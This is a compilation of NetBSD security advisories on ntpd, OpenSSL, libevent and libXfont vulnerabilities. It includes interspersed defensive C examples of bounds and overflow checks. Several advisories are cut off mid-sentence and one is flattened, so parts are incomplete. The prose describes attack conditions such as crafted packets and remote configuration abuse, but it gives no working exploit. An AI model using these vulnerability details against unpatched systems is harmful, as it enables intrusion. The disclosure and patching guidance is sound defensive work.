  netbsd-5-1    1.2.6.2
  netbsd-5-2    1.2.12.2
  netbsd-5      1.2.2.2
  netbsd-6-0    1.2.10.2
  netbsd-6-1    1.2.14.2
  netbsd-6      1.2.8.2
  netbsd-7      1.4.4.1
  HEAD          1.5

use build.sh -x distribution to build a new system including X after
updating your source.

Thanks To
=========

Thanks to Ilja van Sprundel, Alan Coopersmith and
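The three BDF issues in the Technical Details are each a missing check at the point where a value read from the font file is trusted. As an added example, not libXfont's bdfread.c, the following applies the corresponding checks to constructed BDF input: a property count is rejected when negative or when multiplying it by the element size would overflow (CVE-2015-1802), a BBX metrics line is rejected when a value read as 32-bit does not fit the 16-bit field it would be stored in (CVE-2015-1804), and a bitmap row that cannot be decoded stops the character with an error instead of leaving an unusable pointer behind (CVE-2015-1803). The `bdf_property` stand-in struct, function names and sample lines are this example's assumptions.

```c
/* Added example, not libXfont code: the range checks CVE-2015-1802,
 * -1803 and -1804 call for, applied to constructed BDF lines. */
#include <errno.h>
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

struct bdf_property { char name[64]; char value[128]; };  /* stand-in for the real entry */

/* CVE-2015-1802: the property count comes from the file.  Reject a
 * negative count and a count whose product with the element size would
 * wrap; returns the byte size to allocate, or 0 if the count is unusable. */
size_t bdf_property_alloc_size(long count)
{
    if (count < 0)
        return 0;
    if ((unsigned long)count > SIZE_MAX / sizeof(struct bdf_property))
        return 0;
    return (size_t)count * sizeof(struct bdf_property);
}

/* CVE-2015-1804: metrics are parsed as 32-bit values but the xCharInfo
 * fields are 16-bit, so the narrowing must be checked, not assumed. */
int bdf_fits_int16(int32_t v)
{
    return v >= INT16_MIN && v <= INT16_MAX;
}

/* Parse "BBX w h xoff yoff" into 16-bit metrics.  0 on success, -1 if a
 * field is missing, unparsable, or outside the 16-bit range. */
int bdf_parse_bbx(const char *line, int16_t out[4])
{
    long v[4];
    const char *p = line;
    int i;

    if (strncmp(p, "BBX", 3) != 0)
        return -1;
    p += 3;
    for (i = 0; i < 4; i++) {
        char *end;
        long x;

        errno = 0;
        x = strtol(p, &end, 10);
        if (end == p || errno != 0)
            return -1;                          /* missing or out-of-range token */
        if (x < INT32_MIN || x > INT32_MAX)
            return -1;                          /* what the parser reads */
        if (!bdf_fits_int16((int32_t)x))
            return -1;                          /* what the struct can hold */
        v[i] = x;
        p = end;
    }
    for (i = 0; i < 4; i++)
        out[i] = (int16_t)v[i];
    return 0;
}

/* CVE-2015-1803: decode `height` hex rows of `bytes_per_row` bytes into
 * `bitmap`.  Any short or non-hex row returns -1 immediately, so the
 * caller never continues with a half-filled bitmap. */
int bdf_read_bitmap(const char *rows[], int height, int bytes_per_row, uint8_t *bitmap)
{
    int r, b;

    for (r = 0; r < height; r++) {
        const char *row = rows[r];

        if (row == NULL || strlen(row) < (size_t)(2 * bytes_per_row))
            return -1;                          /* row shorter than the bitmap width */
        for (b = 0; b < bytes_per_row; b++) {
            char hex[3];
            char *end;
            unsigned long val;

            hex[0] = row[2 * b];
            hex[1] = row[2 * b + 1];
            hex[2] = '\0';
            val = strtoul(hex, &end, 16);
            if (*end != '\0')
                return -1;                      /* not two hex digits */
            bitmap[r * bytes_per_row + b] = (uint8_t)val;
        }
    }
    return 0;
}
```

The allocation-size helper is the piece most easily generalised: any count-times-size computation on parser input should be bounded the same way (or handed to calloc(3), which performs the overflow check itself) before the result is used as a buffer length.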
NetBSD Security Advisory 2016-001: Multiple vulnerabilities in ntp daemon
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2016-001
                 =================================

Topic:          Multiple vulnerabilities in ntp daemon

Version:        NetBSD-current:         source prior to Fri, Oct 23 2015
                NetBSD 7.0:             affected
                NetBSD 6.1 - 6.1.5:     affected
                NetBSD 6.0 - 6.0.6:     affected

Severity:       Local DoS / Kernel execution redirection

Fixed:          NetBSD-current:         Fri, Oct 23 2015
                NetBSD-7-0 branch:      Sat, Nov 7 2015
                NetBSD-6-1 branch:      Sat, Nov 7 2015
                NetBSD-6-0 branch:      Sat, Nov 7 2015
                NetBSD-6 branch:        Sat, Nov 7 2015

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

Several bugs were fixed in the ntp-4.8.4p4 release that affect the
daemon operation and can be remotely exploited:

 - crash the daemon
 - perform code injection
 - change time
 - overwrite files
 - consume excessive CPU and/or disk space

Technical Details
=================

1. Remote Configuration Attacks

   If ntpd(8) is configured to allow remote configuration, and if the
   (possibly spoofed) source IP address is allowed to send remote
   configuration requests, and if the attacker knows the remote
   configuration password or if ntpd(8) was configured to disable
   authentication, then an attacker can send a set of packets to ntpd(8)
   that may cause it to:

   - Memory corruption, with the hypothetical possibility of a code
     injection. [CVE-2015-7854], [CVE-2015-7849]
   - Overwrite files. [CVE-2015-7851]
   - Crash and/or create a potentially huge log file. Specifically, the
     attacker could enable extended logging, point the key file at the
     log file, and cause what amounts to an infinite loop.
     [CVE-2015-7850]
   - Overwrite other files. In particular, it is possible for an attacker
     to use the "pidfile" or "driftfile" directives to potentially
     overwrite other files. [CVE-2015-5196]

   The default configuration of ntpd(8) within NetBSD does not allow
   remote configuration.

2. Autokey issues

   If ntpd(8) is configured to use autokey, then an attacker can send
   packets to ntpd that will, after several days of ongoing attack, cause
   it to run out of memory. [CVE-2015-7701]

   The fix for CVE-2014-9750 was incomplete in that there were certain
   code paths where a packet with particular autokey operations that
   contained malicious data was not always being completely validated.
   Receipt of these packets can cause ntpd to crash. [CVE-2015-7691,
   CVE-2015-7692, CVE-2015-7702].

   The default configuration of ntpd(8) within NetBSD does not use
   autokey.

3. Crypto-NAK packets

   Crypto-NAK packets can be used to cause ntpd(8) to accept time from
   an unauthenticated ephemeral symmetric peer by bypassing the
   authentication required to mobilize peer associations.
   [CVE-2015-7871]

4. Crafted mode 6 and 7 packets

   If ntpd(8) is fed a crafted mode 6 or mode 7 packet containing an
   unusually long data value where a network address is expected, the
   decodenetnum() function will abort with an assertion failure instead
   of simply returning a failure condition. [CVE-2015-7855]

   If ntpd(8) is configured to enable mode 7 packets, and if the use of
   mode 7 packets is not properly protected through the use of the
   available mode 7 authentication and restriction mechanisms, and if
   the (possibly spoofed) source IP address is allowed to send mode 7
   queries, then an attacker can send a crafted packet to ntpd that will
   cause it to crash. [CVE-2015-7848]

   The default configuration of ntpd(8) within NetBSD does not allow
   mode 7 packets.

5. Custom refclock driver incomplete data validation

   A negative value for the datalen parameter will overflow a data
   buffer. The NTF ntpd(8) driver implementation always sets this value
   to 0 and is therefore not vulnerable to this weakness. If the system
   runs a custom refclock driver in ntpd(8) and that driver supplies a
   negative value for datalen (no custom driver of even minimal
   competence would do this), then ntpd(8) would overflow the data
   buffer. It is even hypothetically possible in this case that instead
   of simply crashing ntpd(8), the attacker could effect a code
   injection attack. [CVE-2015-7853]

6. ntpq(8) potential memory corruption

   If an attacker can figure out the precise moment that ntpq(8) is
   listening for data and the port number on which it is listening, or
   if the attacker can provide a malicious instance ntpd(8) that
NetBSD Security Advisory 2015-007: OpenSSL and SSLv3 vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2015-007 = Topic: OpenSSL and SSLv3 vulnerabilities Version:NetBSD-current: source prior to Mar 19th NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected NetBSD 5.1 - 5.1.4: affected NetBSD 5.2 - 5.2.2: affected pkgsrc: affected Severity: remote DoS, confidentiality compromise Fixed: NetBSD-current: Mar 20th, 2015 NetBSD-7 branch:Mar 20th, 2015 NetBSD-6-0 branch: Mar 20th, 2015 NetBSD-6-1 branch: Mar 20th, 2015 NetBSD-6 branch:Mar 20th, 2015 NetBSD-5-2 branch: Mar 20th, 2015 NetBSD-5-1 branch: Mar 20th, 2015 NetBSD-5 branch:Mar 20th, 2015 pkgsrc: openssl-1.0.2a corrects this issue Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract This advisory covers the OpenSSL Security Advisory of Mar 19th, 2015 which lists eight different vulnerabilities that affect NetBSD releases: RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204) (reclassified) Segmentation fault in ASN1_TYPE_cmp (CVE-2015-0286) ASN.1 structure reuse memory corruption (CVE-2015-0287) PKCS7 NULL pointer dereferences (CVE-2015-0289) Base64 decode (CVE-2015-0292) (fixed in January without advisory) DoS via reachable assert in SSLv2 servers (CVE-2015-0293) Use After Free following d2i_ECPrivatekey error (CVE-2015-0209) X509_to_X509_REQ NULL pointer deref (CVE-2015-0288) Technical Details = See: https://www.openssl.org/news/secadv/20150319.txt Solutions and Workarounds = Workarounds (partial) : the MiTM weakening of chosen encryption will not work if the server does not allow weak encryption; this is usually configurable on the server side. This will incidentally also protect against CVE-2015-0293. Solution: Update the OpenSSL libraries and restart all affected services. 
If you are on NetBSD 6.x or newer: Please note that the versions below represent fixes of the vulnerabilities against OpenSSL 1.0.1k; in the meantime the rest of OpenSSL 1.0.1m has been applied, and we would suggest updating to that. If you are using NetBSD 5.x: Please be aware that while the crypto library from the OpenSSL in NetBSD 5.x is still ok, that is not true for the ssl library. The ssl library supports as newest and safest protocol TLS 1.0, and that is no longer considered good enough. At the same time we cannot just update OpenSSL on that branch to a newer version since all available newer ones are incompatible. Thus we would advise you to use OpenSSL from pkgsrc for all uses where you actually want secure SSL connections. Programs in base that use libssl are: amd, pkgtools, postfix, hostapd, wpa_supplicant, httpd and the ldap client. In cases where you use the encrypted communications feature of these programs across an untrusted medium, using replacements from pkgsrc is recommended as well. - From source: +--- Update src and rebuild and install. 
        Changed files:

        relative to src/crypto/external/bsd/openssl/dist:

        File                            HEAD    netbsd-7
        ----                            ----    --------
        crypto/asn1/a_type.c            1.2     1.1.1.1.26.2
        crypto/asn1/tasn_dec.c          1.2     1.1.1.2.22.2
        crypto/pkcs7/pk7_doit.c         1.2     1.1.1.5.2.1
        crypto/pkcs7/pk7_lib.c          1.2     1.1.1.2.22.1
        doc/crypto/d2i_X509.pod         1.2     1.1.1.2.26.1
        ssl/s2_lib.c                    1.3     1.1.1.2.2.2
        ssl/s2_srvr.c                   1.2     1.1.1.4.10.2

        File                            netbsd-6        netbsd-6-1        netbsd-6-0
        ----                            --------        ----------        ----------
        crypto/asn1/a_type.c            1.1.1.1.8.2     1.1.1.1.22.2      1.1.1.1.14.2
        crypto/asn1/tasn_dec.c          1.1.1.2.4.2     1.1.1.2.18.2      1.1.1.2.10.2
        crypto/pkcs7/pk7_doit.c         1.1.1.3.4.3     1.1.1.3.4.1.6.2   1.1.1.3.4.1.4.2
        crypto/pkcs7/pk7_lib.c          1.1.1.2.4.1     1.1.1.2.18.1      1.1.1.2.10.1
        doc/crypto/d2i_X509.pod         1.1.1.2.8.1     1.1.1.2.22.1      1.1.1.2.14.1
        ssl/s2_lib.c                    1.1.1.1.8.3     1.1.1.1.22.3      1.1.1.1.14.3
        ssl/s2_srvr.c                   1.1.1.3.4.3     1.1.1.3.12.3      1.1.1.3.10.3

        relative to src/crypto/dist/openssl:

        File                            netbsd-5        netbsd-5-2        netbsd-5-1
        ----                            --------        ----------        ----------
        crypto/asn1/a_type.c            1.1.1.7.4.2     1.1.1.7.2.2       1.1.1.7.12.2
        crypto/asn1/tasn_dec.c
NetBSD Security Advisory 2015-008: OpenSSL and TLS protocol vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

                 NetBSD Security Advisory 2015-008
                 =================================

Topic:          OpenSSL and TLS protocol vulnerabilities

Version:        NetBSD-current:         source prior to July 7th
                NetBSD 6.1 - 6.1.5:     affected
                NetBSD 6.0 - 6.0.6:     affected
                NetBSD 5.1 - 5.1.4:     affected
                NetBSD 5.2 - 5.2.2:     affected
                pkgsrc:                 affected

Severity:       remote DoS, confidentiality compromise

Fixed:          NetBSD-current:         Jul 7th, 2015
                NetBSD-7 branch:        Jul 11th, 2015
                NetBSD-6-0 branch:      Jul 12th, 2015
                NetBSD-6-1 branch:      Jul 12th, 2015
                NetBSD-6 branch:        Jul 12th, 2015
                NetBSD-5-2 branch:      Aug 14th, 2015
                NetBSD-5-1 branch:      Aug 14th, 2015
                NetBSD-5 branch:        Aug 14th, 2015
                pkgsrc:                 openssl-1.0.2d corrects these issues

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

This advisory covers the OpenSSL Security Advisory of June 11th, 2015,
which lists seven different vulnerabilities that affect NetBSD releases;
also, the OpenSSL Security Advisory of July 9th, 2015 with one
vulnerability that affected only NetBSD-current:

        DHE man-in-the-middle protection (Logjam, CVE-2015-4000)
        Malformed ECParameters causes infinite loop (CVE-2015-1788)
        Exploitable out-of-bounds read in X509_cmp_time (CVE-2015-1789)
        PKCS7 crash with missing EnvelopedContent (CVE-2015-1790)
        CMS verify infinite loop with unknown hash function (CVE-2015-1792)
        Race condition handling NewSessionTicket (CVE-2015-1791)
        Invalid free in DTLS (CVE-2014-8176)

and

        Alternative chains certificate forgery (CVE-2015-1793)

Also, in NetBSD 5 a regression was introduced October 19th last year
concerning the SSL server code.
Technical Details
=================

See https://www.openssl.org/news/secadv/20150611.txt and
https://www.openssl.org/news/secadv/20150709.txt

The regression in NetBSD 5.* was due to a faulty application of the
POODLE mitigation code, and made the SSL server fail the client handshake
request, with the exception of SSLv3 and TLS1 handshakes where RC4_MD5
was an acceptable cipher, which would then be the cipher getting used.
In summary this caused a comparably weak cipher to be used if the
connection succeeded at all.

Fixing this problem provides only limited help, though: please be aware
that while the crypto library from the OpenSSL in NetBSD 5.x is still
ok, that is not true for the ssl library. The newest and safest protocol
that ssl library supports is TLS 1.0, and that is no longer considered
good enough. At the same time we cannot just update OpenSSL on that
branch to a newer version since all available newer ones are
incompatible.


Solutions and Workarounds
=========================

Solution: Update the OpenSSL libraries and restart all affected services.

Users of NetBSD 5.*: Please consider using OpenSSL from pkgsrc for all
uses where you actually want secure SSL connections. Programs in base
that use libssl are: amd, pkgtools, postfix, hostapd, wpa_supplicant,
httpd and the ldap client. In cases where you use the encrypted
communications feature of these programs across an untrusted medium,
using replacements from pkgsrc is recommended as well.

        From source:
        ------------

        Update src and rebuild and install.

        For NetBSD-6*, NetBSD-7* and NetBSD-current:

                cvs update -dP -r branch crypto/external/bsd/openssl

        From tarballs:
        --------------

        To obtain fixed binaries, fetch the appropriate base.tgz and
        comp.tgz from a daily build later than the fix dates, from
        http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/
        with a date later than the fix date for your branch as listed
        above, and your release version and architecture (e.g.
        http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-6-1/20150300Z/amd64/binary/sets/),
        and then extract the files:

        Shared libraries:

                tar xzpf base.tgz \*libssl\* \*libcrypto\*

        And static libraries and linker config files:

                tar xzpf comp.tgz \*libssl\* \*libcrypto\*

        Get the fixed library into use
        ------------------------------

        Since the vulnerability is in a shared library, getting the old
        library purged and the fixed one into use requires restarting
        all programs that load libssl. The easiest way to do this is to
        reboot the system.

        Another method, using /bin/sh:

                ps ax -o pid | (while read pid; do \
                    pmap $pid | egrep '(libssl|libcrypto)' > /dev/null && echo found $pid ;\
                    done)

        will find non-chrooted programs that have the affected libraries
        open; you'll need to restart them. sshd, ntp and named may not
        show up in this list since they may run chrooted and re-exec'ed
NetBSD Security Advisory 2015-003: NTPd multiple vulnerabilities (CVE-2014-929[3-6])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2015-003
                 =================================

Topic:          NTPd multiple vulnerabilities (CVE-2014-929[3-6])

Version:        NetBSD-current:         source prior to Dec 19, 2014
                NetBSD 7 Beta:          source prior to Dec 23, 2014
                NetBSD 6.1:             affected
                NetBSD 6.0:             affected
                NetBSD 5.2:             affected
                NetBSD 5.1:             affected
                pkgsrc (net/ntp4):      affected

Severity:       Denial of Service

Fixed:          NetBSD-current:         Dec 19, 2014
                NetBSD-7 branch:        Dec 28, 2014
                NetBSD-6 branch:        Dec 29, 2014
                NetBSD-6-1 branch:      Dec 29, 2014
                NetBSD-6-0 branch:      Dec 29, 2014
                NetBSD-5 branch:        Jan 08, 2015
                NetBSD-5-2 branch:      Jan 08, 2015
                NetBSD-5-1 branch:      Jan 08, 2015
                pkgsrc:                 Dec 28, 2014

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

Multiple issues have been discovered with the Network Time Daemon and
related programs, and published by NTP.org and US-CERT on December 19th.
Systems that use ntpd should upgrade to the latest version to avoid
remote DoS attacks, and on NetBSD 5, where there is no Stack Smashing
Protection, to avoid the possibility of a remote compromise.


Technical Details
=================

Four different advisories have been published addressing different
issues:

CVE-2014-9293: Weak Default Key: When no key is set in the configuration
               ntpd(8) will generate keys with very few bits of entropy.

CVE-2014-9294: The random number generator in ntp-keygen(8) is using a
               seed with very few bits of entropy to generate symmetric
               keys.

CVE-2014-9295: With autokey authentication (crypto pw configuration
               directive), a remote user can construct a network packet
               that will cause a stack buffer overflow.

CVE-2014-9296: The ntpd receive() function in ntp_proto.c is missing a
               return on error.


Solutions and Workarounds
=========================

Aside from replacing the daemon, we advise administrators of systems
that use ntpd(8) to firewall ports tcp/123 and udp/123 so that packets
from unknown hosts are rejected.
Get a new ntpd binary:

        VERS being your NetBSD version
        DATE being a build date past the fix date for your version
        ARCH being your machine architecture

        ftp -o /var/tmp/base.tgz http://nyftp.netbsd.org/pub/NetBSD-daily/VERS/DATE/ARCH/binary/sets/base.tgz
        cd /
        tar xzpf /var/tmp/base.tgz ./usr/sbin/ntpd

Since ntpd was updated to the current upstream version, the changes
touch a lot of files; if you want to update from source, updating the
entire src tree is recommended.

Another option to deal with the vulnerability is to install the updated
ntp4 package and use the package ntpd until the system can be updated.


Thanks To
=========

Thanks to Harlan Stenn for alerting us to the upcoming NTP release,
Christos Zoulas for upgrading the package and constructing initial
patches, Jeff Rizzo for updating -7, Soren Jacobsen for updating -6,
and Havard Eidnes for updating -5.


Revision History
================

        2015-03-17      Initial release


More Information
================

Advisories may be updated as new information becomes available. The
most recent version of this advisory (PGP signed) can be found at
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2015-003.txt.asc

Information about NetBSD and NetBSD security can be found at
  http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ .


Copyright 2015, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.
$NetBSD: NetBSD-SA2015-003.txt,v 1.1 2015/03/17 06:58:44 spz Exp $

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBAgAGBQJVCwd7AAoJEAZJc6xMSnBuVj0P/irxWaVdekOl90tiSwu/cMRf
qod+ysopoLOJQdODYDbBHAEMj4Zobw4/gMpBbUE3y3HMD2Wm2IKr4iiuWPMe7YfL
+SctzvoEYUU6ive+RXOblfwiwxpv/Yq5CRnB3nZYpFao+zyQqccTL92gU/lXIBR4
GH5/J2PdYpILkM53nKnUXkcyrBbYwS2+ggAuvqThwKX8mW9h5S7YAXJusXY4qhUi
0Ya415WuDLPSSCp7s6R7/TuQ8Ujo3v53Eh8195bSt0gbY+Bk+0KgTrtm6Ak7BYY0
ImqkymXR0lvwJh+GcltYlSdUFSK0xUEecmD93WvPs9PwwfhD1+HapXZaCQQ/MMN1
ZgchePLDsDSQUQqNitAP633pWZyuQa8HXwXhLTcU7ZOADs4416LhfLnKyNBsimEz
L8SN3O+HtxwiTFwwS2eje30hCSm/j/vqEnhtzWjpuuAxnzY2teTAPcX5t81gYf2s
is21MkIUVKkRKZyK4KYtDhDCHsG5f8nLpZXDfrBZY/ocz5GASoQ+takbDS7nWSfm
GFpYyjRlKJ6xBKcSuNsZ9zF4G6lSyxx60XBSaOu9KewokOEpD/hA6s7QTzLj8Y4L
Y7zfyzzh5+z1uCoY9dKOTMfwTy1pSdblogHGOn+K8IBPDgQ3fwfucz5QVG7oGvlD
CgqPPCdzIeJak0OKLUD3
=df8q
-----END PGP SIGNATURE-----
NetBSD Security Advisory 2015-006: OpenSSL and SSLv3 vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2015-006
                 =================================

Topic:          OpenSSL and SSLv3 vulnerabilities

Version:        NetBSD-current:         source prior to Jan 14th
                NetBSD 6.1 - 6.1.5:     affected
                NetBSD 6.0 - 6.0.6:     affected
                NetBSD 5.1 - 5.1.4:     affected
                NetBSD 5.2 - 5.2.2:     affected

Severity:       remote DoS, confidentiality compromise

Fixed:          NetBSD-current:         Jan 14th, 2015
                NetBSD-7 branch:        Jan 18th, 2015
                NetBSD-6-0 branch:      Jan 17th, 2015
                NetBSD-6-1 branch:      Jan 17th, 2015
                NetBSD-6 branch:        Jan 17th, 2015
                NetBSD-5-2 branch:      Jan 27th, 2015
                NetBSD-5-1 branch:      Jan 27th, 2015
                NetBSD-5 branch:        Jan 27th, 2015

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

This advisory covers the OpenSSL Security Advisory of Jan 8th, 2015,
which lists eight different vulnerabilities:

        DTLS segmentation fault in dtls1_get_record (CVE-2014-3571)
        DTLS memory leak in dtls1_buffer_record (CVE-2015-0206)
        no-ssl3 configuration sets method to NULL (CVE-2014-3569)
        ECDHE silently downgrades to ECDH [Client] (CVE-2014-3572)
        RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)
        DH client certificates accepted without verification [Server]
            (CVE-2015-0205)
        Certificate fingerprints can be modified (CVE-2014-8275)
        Bignum squaring may produce incorrect results (CVE-2014-3570)

Please note that the OpenSSL project has announced the release of a new
version of OpenSSL, with advisories, on March 19th, 2015.


Technical Details
=================

see https://www.openssl.org/news/secadv_20150108.txt


Solutions and Workarounds
=========================

Workarounds: the MiTM weakening of chosen encryption will not work if
the server does not allow weak encryption; this is usually configurable
on the server side.

Solution: Update the OpenSSL libraries.

        From source:
        ------------

        Update src and rebuild and install.
        Note: OpenSSL in NetBSD-6, NetBSD-7 and NetBSD-current has been
        updated to version 1.0.1k; NetBSD-5 received a more selective
        patch but that's still 59 files touched. Updating the entire src
        tree is recommended.

        From tarballs:
        --------------

        To obtain fixed binaries, fetch the appropriate base.tgz and
        comp.tgz from a daily build later than the fix dates, from
        http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/
        with a date later than the fix date for your branch as listed
        above, and your release version and architecture (e.g.
        http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-6-1/201501300500Z/amd64/binary/sets/),
        and then extract the files:

        Shared libraries:

                tar xzpf base.tgz \*libssl\* \*libcrypto\*

        And static libraries and linker config files:

                tar xzpf comp.tgz \*libssl\* \*libcrypto\*

        Get the fixed library into use
        ------------------------------

        Since the vulnerability is in a shared library, getting the old
        library purged and the fixed one into use requires restarting
        all programs that load libssl. The easiest way to do this is to
        reboot the system.

        Another method, using /bin/sh:

                ps ax -o pid | (while read pid; do \
                    pmap $pid | egrep '(libssl|libcrypto)' > /dev/null && echo found $pid ;\
                    done)

        will find non-chrooted programs that have the affected libraries
        open; restart them. sshd will not show up in this list since it
        runs chrooted and re-exec'ed, but it also needs to be restarted.

        ldd programname will show the shared libraries a program will
        want to use.


Thanks To
=========

Thanks to the OpenSSL team for the advisory and fixes, Markus Stenberg
of Cisco Systems, Inc. for reporting CVE-2014-3571, Chris Mueller for
reporting CVE-2015-0206, Frank Schmirler for reporting CVE-2014-3569,
Karthikeyan Bhargavan of the PROSECCO team at INRIA for reporting
CVE-2014-3572, CVE-2015-0204 and CVE-2015-0205, Antti Karjalainen and
Tuomo Untinen from the Codenomicon CROSS program, and Konrad Kraszewski
from Google, for reporting CVE-2014-8275, Pieter Wuille from
Blockstream, for reporting CVE-2014-3570 and suggesting an initial fix,
and Adam Langley of Google for further analysis of the issue.


Revision History
================

        2015-03-17      Initial release


More Information
================

Advisories may be updated as new information becomes available. The
most recent version of this advisory (PGP signed) can be found at
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2015-006.txt.asc

Information about NetBSD and NetBSD security can be found at
  http://www.NetBSD.org/
NetBSD Security Advisory 2015-005: buffer overflow in libevent (CVE-2014-6272)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2015-005
                 =================================

Topic:          buffer overflow in libevent (CVE-2014-6272)

Version:        NetBSD-current:         source prior to Jan 29th
                NetBSD 6.1 - 6.1.5:     affected
                NetBSD 6.0 - 6.0.6:     affected
                NetBSD 5.1 - 5.1.4:     affected
                NetBSD 5.2 - 5.2.2:     affected

Severity:       DoS, potential code execution

Fixed:          NetBSD-current:         Jan 30th, 2015
                NetBSD-7 branch:        Feb 9th, 2015
                NetBSD-6-0 branch:      Feb 5th, 2015
                NetBSD-6-1 branch:      Feb 5th, 2015
                NetBSD-6 branch:        Feb 5th, 2015
                NetBSD-5-2 branch:      Feb 5th, 2015
                NetBSD-5-1 branch:      Feb 5th, 2015
                NetBSD-5 branch:        Feb 5th, 2015

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

A defect in the libevent evbuffer API leaves programs that pass inputs
which in sum overflow size_t to evbuffers vulnerable to a possible heap
overflow or infinite loop. For this to be a security issue, the
vulnerable program also must not be sanitizing buffer sizes supplied by
the user.


Technical Details
=================

A program that uses evbuffer_add or evbuffer_expand followed by a
bufferevent_write in NetBSD-6 or below, and additionally
evbuffer_prepend, evbuffer_reserve_space or evbuffer_read in NetBSD-7
and -current, and does not sanity check user-derived buffer sizes it
passes to the library functions, may allow an attacker to construct an
evbuffer with inconsistent size and to overwrite parts of the program's
memory outside the evbuffer.


Solutions and Workarounds
=========================

Update libevent.

        From source:
        ------------

        Update src and rebuild and install.

        From tarballs:
        --------------

        To obtain fixed binaries, fetch the appropriate base.tgz and
        comp.tgz from a daily build later than the fix dates, from
        http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/
        with a date later than the fix date for your branch as listed
        above, and your release version and architecture (e.g.
        http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-6-0/201502080050Z/amd64/binary/sets/),
        and then extract the files:

        Shared libraries:

                tar xzpf base.tgz \*libevent\*

        And static libraries and linker config files:

                tar xzpf comp.tgz \*libevent\*

        Get the fixed library into use
        ------------------------------

        Since the vulnerability is in a shared library, getting the old
        library purged and the fixed one into use requires restarting
        all programs that load libevent. The easiest way to do this is
        to reboot the system.

        Another method, using /bin/sh:

                ps ax -o pid | (while read pid; do \
                    pmap $pid | egrep 'libevent' > /dev/null && echo found $pid ;\
                    done)

        will find non-chrooted programs that have the affected libraries
        open; restart them.

        ldd programname will show the shared libraries a program will
        want to use.

        Fixed vulnerable source versions
        --------------------------------

        src/external/bsd/libevent/dist/buffer.c
                HEAD            1.3
                netbsd-7        1.2.8.1
                netbsd-6        1.1.1.1.8.1
                netbsd-6-1      1.1.1.1.20.1
                netbsd-6-0      1.1.1.1.14.1

        src/lib/libevent/buffer.c
                netbsd-5        1.4.4.2
                netbsd-5-2      1.4.4.1.6.1
                netbsd-5-1      1.4.4.1.2.1


Thanks To
=========

Thanks to Andrew Bartlett of Catalyst (catalyst.net.nz) for reporting
this issue and Nick Mathewson of libevent for their advisory and fix.


Revision History
================

        2015-03-17      Initial release


More Information
================

Advisories may be updated as new information becomes available. The
most recent version of this advisory (PGP signed) can be found at
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2015-005.txt.asc

Information about NetBSD and NetBSD security can be found at
  http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ .


Copyright 2015, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.
$NetBSD: NetBSD-SA2015-005.txt,v 1.1 2015/03/17 06:58:44 spz Exp $

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBAgAGBQJVCweMAAoJEAZJc6xMSnBuO9cP/2A29i3qF33fqxecE0j7qJT0
gtqy6mti0pEzmgAsNWBo9SRmLZY7JwOIESlaHBKLKbrgcmH7lUVpF4IlNSSITTFY
mrkGZUtJbmS7jyDB9FNEnnYuAVdarFM8OJH3EgfByz+TsgxsBbkTG8BtOmIg21SW
zcrmFn1/jaRJeTx4vqxpm084d6H65ZUnjjZNaSG4ReLur1mJRkAkq9yiiLsfpTUN
3pRiTtG3SMGuN6OkEjnRpZ8uGW+7xR6fnzOrJZRqWQtj/kh/NfOZz1emgXRpbPNS
mz3QqoDT7eDuwvZY+OxJOHwSDd1i5OclHbMR3qCABXpoTVpT3Kwf/IziQA8VWSGP
RiiJO56qoTD+z9wruBPFLuQzgBrU+UPOcXywtyl8y5sJstWrwJiGQiU/2XFacksp
iUV5ZddctN0gyZl4ryYtRsrKH81HiBrmMvOBj/Kju+ZGRKMWgMO0Ub9sAOM5J694
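The Technical Details above describe the CVE-2014-6272 defect as a sum of caller-supplied sizes that wraps around size_t. The following is an added example, not libevent's code and not from this advisory: a minimal evbuffer-like structure whose grow path checks the sum before using it, next to the unchecked arithmetic so the wraparound is visible. The struct and function names, the doubling growth policy and the `max_total` bound are this example's own choices.

```c
/* Added example, not libevent's code: a toy evbuffer whose add/expand
 * path checks for size_t overflow before growing, which is the class of
 * defect in CVE-2014-6272. unchecked_new_len() only computes the wrapped
 * length and never writes memory, so it is safe to call. */
#include <stdint.h>
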